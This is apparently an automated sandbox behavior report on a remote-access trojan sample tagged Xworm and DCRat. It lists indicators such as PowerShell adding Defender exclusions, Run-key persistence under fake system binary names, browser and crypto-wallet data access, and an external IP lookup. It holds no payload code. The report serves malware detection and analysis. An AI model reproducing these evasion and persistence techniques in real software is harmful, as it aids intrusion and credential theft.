Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2708	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1132	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4264	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3036	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4412	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1840	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4420	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2012	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4172	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	740	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3076	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4904	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3620	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4912	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4352	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5088	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4464	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3112	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3624	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4336	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4644	3040	schtasks.exe	109

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x0007000000023435-18.dat	dcrat
behavioral2/memory/2336-348-0x0000000000860000-0x0000000000B78000-memory.dmp	dcrat
behavioral2/files/0x000e00000002347e-381.dat	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 38 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2372	powershell.exe
1140	powershell.exe
3644	powershell.exe
5052	powershell.exe
1600	powershell.exe
1576	powershell.exe
2644	powershell.exe
2872	powershell.exe
1532	powershell.exe
4372	powershell.exe
6376	powershell.exe
956	powershell.exe
1104	powershell.exe
2440	powershell.exe
4180	powershell.exe
4108	powershell.exe
2312	powershell.exe
4884	powershell.exe
2416	powershell.exe
3676	powershell.exe
896	powershell.exe
6388	powershell.exe
1544	powershell.exe
4928	powershell.exe
5004	powershell.exe
4560	powershell.exe
1668	powershell.exe
6432	powershell.exe
6428	powershell.exe
6392	powershell.exe
440	powershell.exe
4064	powershell.exe
1720	powershell.exe
1472	powershell.exe
664	powershell.exe
2576	powershell.exe
2356	powershell.exe
1148	powershell.exe

Checks computer location settings 2 TTPs 21 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	amamamsus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	hatabat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	scvhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	amamamsus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	amamamsus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sgredgkrtf09weut3r435.lnk	scvhost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sgredgkrtf09weut3r435.lnk	scvhost.exe

Executes dropped EXE 26 IoCs

pid	Process
2680	adb.exe
3672	dllhost.exe
1976	fastboot.exe
1816	scvhost.exe
4016	setup.exe
4880	setup.exe
2336	amamamsus.exe
1220	amamamsus.exe
1908	rar.exe
1964	amamamsus.exe
2260	amamamsus.exe
5944	powershell.exe
1592	powershell.exe
6020	powershell.exe
3824	powershell.exe
5648	sgredgkrtf09weut3r435.exe
7120	powershell.exe
6668	powershell.exe
6596	powershell.exe
5000	powershell.exe
6544	powershell.exe
3652	sgredgkrtf09weut3r435.exe
5204	powershell.exe
3108	powershell.exe
5332	powershell.exe
6452	powershell.exe

Loads dropped DLL 21 IoCs

pid	Process
2680	adb.exe
2680	adb.exe
1976	fastboot.exe
1976	fastboot.exe
4880	setup.exe
4880	setup.exe
4880	setup.exe
4880	setup.exe
4880	setup.exe
4880	setup.exe
4880	setup.exe
4880	setup.exe
4880	setup.exe
4880	setup.exe
4880	setup.exe
4880	setup.exe
4880	setup.exe
4880	setup.exe
4880	setup.exe
4880	setup.exe
4880	setup.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4880-111-0x00007FF84AA40000-0x00007FF84B028000-memory.dmp	upx
behavioral2/files/0x0007000000023450-107.dat	upx
behavioral2/files/0x0007000000023443-115.dat	upx
behavioral2/files/0x000700000002344a-137.dat	upx
behavioral2/memory/4880-147-0x00007FF866CE0000-0x00007FF866CEF000-memory.dmp	upx
behavioral2/memory/4880-146-0x00007FF85F780000-0x00007FF85F7A4000-memory.dmp	upx
behavioral2/files/0x0007000000023449-136.dat	upx
behavioral2/files/0x0007000000023448-135.dat	upx
behavioral2/files/0x0007000000023447-134.dat	upx
behavioral2/files/0x0007000000023446-133.dat	upx
behavioral2/files/0x0007000000023445-132.dat	upx
behavioral2/files/0x0007000000023444-131.dat	upx
behavioral2/files/0x0007000000023442-130.dat	upx
behavioral2/files/0x0007000000023455-129.dat	upx
behavioral2/files/0x0007000000023454-128.dat	upx
behavioral2/files/0x0007000000023453-127.dat	upx
behavioral2/files/0x000700000002344f-124.dat	upx
behavioral2/files/0x000700000002344d-123.dat	upx
behavioral2/memory/4880-161-0x00007FF848D70000-0x00007FF848EE3000-memory.dmp	upx
behavioral2/memory/4880-167-0x00007FF854270000-0x00007FF85429E000-memory.dmp	upx
behavioral2/memory/4880-174-0x00007FF8483C0000-0x00007FF848735000-memory.dmp	upx
behavioral2/memory/4880-179-0x00007FF85CF60000-0x00007FF85CF6D000-memory.dmp	upx
behavioral2/memory/4880-181-0x00007FF8482A0000-0x00007FF8483BC000-memory.dmp	upx
behavioral2/memory/4880-177-0x00007FF85B410000-0x00007FF85B424000-memory.dmp	upx
behavioral2/memory/4880-176-0x00007FF85F780000-0x00007FF85F7A4000-memory.dmp	upx
behavioral2/memory/4880-173-0x00007FF84AA40000-0x00007FF84B028000-memory.dmp	upx
behavioral2/memory/4880-171-0x00007FF849070000-0x00007FF849128000-memory.dmp	upx
behavioral2/memory/4880-165-0x00007FF85CFB0000-0x00007FF85CFBD000-memory.dmp	upx
behavioral2/memory/4880-163-0x00007FF85C700000-0x00007FF85C719000-memory.dmp	upx
behavioral2/memory/4880-159-0x00007FF8571D0000-0x00007FF8571F3000-memory.dmp	upx
behavioral2/memory/4880-157-0x00007FF85D670000-0x00007FF85D689000-memory.dmp	upx
behavioral2/memory/4880-155-0x00007FF858580000-0x00007FF8585AD000-memory.dmp	upx
behavioral2/files/0x000700000002344e-121.dat	upx
behavioral2/memory/4880-345-0x00007FF8571D0000-0x00007FF8571F3000-memory.dmp	upx
behavioral2/memory/4880-470-0x00007FF848D70000-0x00007FF848EE3000-memory.dmp	upx
behavioral2/memory/4880-810-0x00007FF84AA40000-0x00007FF84B028000-memory.dmp	upx
behavioral2/memory/4880-825-0x00007FF85C700000-0x00007FF85C719000-memory.dmp	upx
behavioral2/memory/4880-821-0x00007FF8483C0000-0x00007FF848735000-memory.dmp	upx
behavioral2/memory/4880-820-0x00007FF849070000-0x00007FF849128000-memory.dmp	upx
behavioral2/memory/4880-819-0x00007FF854270000-0x00007FF85429E000-memory.dmp	upx
behavioral2/memory/4880-811-0x00007FF85F780000-0x00007FF85F7A4000-memory.dmp	upx
behavioral2/memory/4880-830-0x00007FF84AA40000-0x00007FF84B028000-memory.dmp	upx
behavioral2/memory/4880-850-0x00007FF8571D0000-0x00007FF8571F3000-memory.dmp	upx
behavioral2/memory/4880-855-0x00007FF849070000-0x00007FF849128000-memory.dmp	upx
behavioral2/memory/4880-854-0x00007FF854270000-0x00007FF85429E000-memory.dmp	upx
behavioral2/memory/4880-853-0x00007FF85CFB0000-0x00007FF85CFBD000-memory.dmp	upx
behavioral2/memory/4880-852-0x00007FF85C700000-0x00007FF85C719000-memory.dmp	upx
behavioral2/memory/4880-851-0x00007FF848D70000-0x00007FF848EE3000-memory.dmp	upx
behavioral2/memory/4880-849-0x00007FF85D670000-0x00007FF85D689000-memory.dmp	upx
behavioral2/memory/4880-848-0x00007FF858580000-0x00007FF8585AD000-memory.dmp	upx
behavioral2/memory/4880-847-0x00007FF866CE0000-0x00007FF866CEF000-memory.dmp	upx
behavioral2/memory/4880-846-0x00007FF85F780000-0x00007FF85F7A4000-memory.dmp	upx
behavioral2/memory/4880-845-0x00007FF8483C0000-0x00007FF848735000-memory.dmp	upx
behavioral2/memory/4880-844-0x00007FF8482A0000-0x00007FF8483BC000-memory.dmp	upx
behavioral2/memory/4880-843-0x00007FF85CF60000-0x00007FF85CF6D000-memory.dmp	upx
behavioral2/memory/4880-842-0x00007FF85B410000-0x00007FF85B424000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Recovery\\WindowsRE\\SearchApp.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Branding\\shellbrd\\smss.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Users\\Default User\\TextInputHost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\setup = "\"C:\\Program Files\\7-Zip\\setup.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sgredgkrtf09weut3r435 = "C:\\Users\\Admin\\AppData\\Roaming\\sgredgkrtf09weut3r435.exe"	scvhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\DiagTrack\\smss.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Recovery\\WindowsRE\\Idle.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Recovery\\WindowsRE\\SearchApp.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\AppReadiness\\explorer.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files (x86)\\Windows Mail\\csrss.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files (x86)\\Windows Mail\\powershell.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Windows\\bcastdvr\\cmd.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\DiagTrack\\smss.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Recovery\\WindowsRE\\Idle.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\en-US\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Sidebar\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Recovery\\WindowsRE\\SearchApp.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\AppReadiness\\explorer.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\powershell.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\AppReadiness\\explorer.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Recovery\\WindowsRE\\Idle.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\setup = "\"C:\\Program Files\\7-Zip\\setup.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\de-DE\\fontdrvhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\DiagTrack\\smss.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Recovery\\WindowsRE\\Idle.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Windows\\bcastdvr\\cmd.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\en-US\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files (x86)\\Windows Mail\\powershell.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\AppReadiness\\explorer.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\DiagTrack\\smss.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\powershell.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Branding\\shellbrd\\smss.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Windows\\bcastdvr\\cmd.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Windows\\bcastdvr\\cmd.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files (x86)\\Windows Mail\\csrss.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\CbsTemp\\winlogon.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\CbsTemp\\winlogon.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\de-DE\\fontdrvhost.exe\""	amamamsus.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	WScript.exe
File opened (read-only)	\??\B:	WScript.exe
File opened (read-only)	\??\E:	WScript.exe
File opened (read-only)	\??\I:	WScript.exe
File opened (read-only)	\??\L:	WScript.exe
File opened (read-only)	\??\O:	WScript.exe
File opened (read-only)	\??\P:	WScript.exe
File opened (read-only)	\??\R:	WScript.exe
File opened (read-only)	\??\T:	WScript.exe
File opened (read-only)	\??\X:	WScript.exe
File opened (read-only)	\??\N:	WScript.exe
File opened (read-only)	\??\U:	WScript.exe
File opened (read-only)	\??\Y:	WScript.exe
File opened (read-only)	\??\A:	WScript.exe
File opened (read-only)	\??\G:	WScript.exe
File opened (read-only)	\??\H:	WScript.exe
File opened (read-only)	\??\J:	WScript.exe
File opened (read-only)	\??\M:	WScript.exe
File opened (read-only)	\??\Z:	WScript.exe
File opened (read-only)	\??\K:	WScript.exe
File opened (read-only)	\??\Q:	WScript.exe
File opened (read-only)	\??\S:	WScript.exe
File opened (read-only)	\??\V:	WScript.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Drops file in Program Files directory 29 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\6ccacd8608530f	amamamsus.exe
File created	C:\Program Files\Windows Portable Devices\e1ef82546f0b02	amamamsus.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe	amamamsus.exe
File created	C:\Program Files (x86)\Windows Mail\e978f868350d50	amamamsus.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\ea9f0e6c9e2dcd	amamamsus.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe	amamamsus.exe
File opened for modification	C:\Program Files\Windows Portable Devices\SppExtComObj.exe	amamamsus.exe
File created	C:\Program Files (x86)\Windows Defender\ja-JP\e978f868350d50	amamamsus.exe
File created	C:\Program Files (x86)\Windows Mail\csrss.exe	amamamsus.exe
File created	C:\Program Files\Windows Sidebar\conhost.exe	amamamsus.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\cmd.exe	amamamsus.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\ebf1f9fa8afd6d	amamamsus.exe
File opened for modification	C:\Program Files\Windows Portable Devices\e1ef82546f0b02	amamamsus.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\088424020bedd6	amamamsus.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\conhost.exe	amamamsus.exe
File created	C:\Program Files\Windows Portable Devices\SppExtComObj.exe	amamamsus.exe
